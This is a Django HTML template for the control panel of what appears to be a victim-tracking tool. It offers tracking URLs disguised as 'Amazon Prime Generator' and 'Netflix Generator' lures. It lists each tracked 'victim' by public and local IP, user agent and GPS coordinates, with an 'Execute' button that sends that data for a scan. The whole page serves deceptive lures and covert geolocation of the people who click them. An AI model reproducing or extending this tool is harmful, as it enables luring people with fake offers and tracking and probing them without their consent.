{% extends "base.html" %}

{% load static %}

{% block content %}

<div class="content  d-flex flex-column flex-column-fluid" id="kt_content">
    <!--begin::Entry-->
    <div class="d-flex flex-column-fluid">
        <!--begin::Container-->
        <div class="container">

<center>
        <div class="table-responsive table-body">

            <table class="table table-hover table-striped table-light table-bordered">
            <thead>
                <tr>
                <th scope="col"><center>Template</center></th>
                <th scope="col"><center>Tracking URL</center></th>
                <th scope="col"></th>
                </tr>
            </thead>
            <tbody>
                <tr>
                <td><center>Amazon Prime Generator</center></td>
                <td><center>{{url.1}}</center></td>
                <td><center><button type="submit" value="query" id="btn" data-clipboard-text="{{url.1}}" data-toggle="button" aria-pressed="false" class="btn btn-primary btn-sm">Copy</button></center></td>
                </tr>
                <tr>
                <td><center>Netflix Generator</center></td>
                <td><center>{{url.2}}</center></td>
                <td><center><button type="submit" value="query" id="btn2" data-clipboard-text="{{url.2}}" data-toggle="button" aria-pressed="false" class="btn btn-primary btn-sm">Copy</button></center></td>
                </tr>
            </tbody>
            </table>

            <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js"></script>

        <script>
        var btn = document.getElementById('btn');
        var clipboard = new ClipboardJS(btn);

        clipboard.on('success', function(e) {
            console.log(e);
        });

        clipboard.on('error', function(e) {
            console.log(e);
        });
        </script>

        <script>
        var btn = document.getElementById('btn2');
        var clipboard = new ClipboardJS(btn);

        clipboard.on('success', function(e) {
            console.log(e);
        });

        clipboard.on('error', function(e) {
            console.log(e);
        });
        </script>
        </div>
        <br>
        
        {% if victim == None %}
            <a href="javascript:refresh();" type="button" class="btn btn-secondary">Refresh</a>
        {% endif %}

        {% if victim %}
        <div class="card text-center">
        <div class="card-header">
            Victim Track Records
        </div></div>
        <div class="table-responsive table-body">
        <table class="table table-hover table-striped table-light table-bordered">
            <thead>
            <tr>
                <th class="col-md-3" scope="col">Public IP</th>
                <th class="col-md-3" scope="col">Local IP</th>
                <th class="col-md-3" scope="col">User Agent</th>
                <th class="col-md-3" scope="col">Latitude</th>
                <th class="col-md-3" scope="col">Longitude</th>
                <th class="col-md-3" scope="col">Scan</th>
            </tr>
            </thead>
            <tbody>

            {% for victims in victim %}
            <tr>
            <th scope="row">{{victims.0}}</th>               
            <td>{{victims.1}}</td>
            <td>{{victims.2}}</td>
            <td>{{victims.3}}</td>
            <td>{{victims.4}}</td>

            {% load extras %}

            <form id="{{victims.0}}" name="searchform" method="POST" action="/" > {% csrf_token %}
            
                {% define victims.0 as publicip %}
                {% defines victims.3 as latitude %}
                {% defines victims.4 as longitude %}
                {% ifnotequal victims.3 "Not Disclosed"%}
                <input hidden name="query" id="query" value="{{publicip|add:latitude|add:longitude}}">
                {% else %}
                <input hidden name="query" id="query" value="{{publicip}}">
                {% endifnotequal %}
                <input type="hidden" name="g-recaptcha-response" id="{{victims.0}}_g-recaptcha-token" value="" />
                <button id="{{victims.0}}_recaptcha" class="g-recaptcha" data-sitekey="6LdcXqUZAAAAAP7lK_k0muU99TX9UTnXZJh-VmVw" data-callback='onSubmit' hidden>Submit</button>
            <td><button type="button" onclick="javascript:ipset('{{victims.0}}');" value="query" class="btn btn-primary btn-sm">Execute</button></td>
            </form>
            </tr>
            {% endfor %}
            </tbody>
        </table>
        </div>
        <br>
        <br>
      
        <table>
        <tr>
        <td style="padding-right:10px"><a href="javascript:refresh()" type="button" class="btn btn-secondary">Refresh</a></td>
        <td>
        <form id="flushdb" name="flushdb" method="POST" action=""> {% csrf_token %}
        <input type="submit" width="100px" id="flush" name="flush" value="Flush" class="btn btn-danger"></input>  
        </form>
        </td>
        </tr> 
        </table>
        <br>
        {% endif %}
        </center>
    
        </div>
    </div>
</div>



{% endblock %}
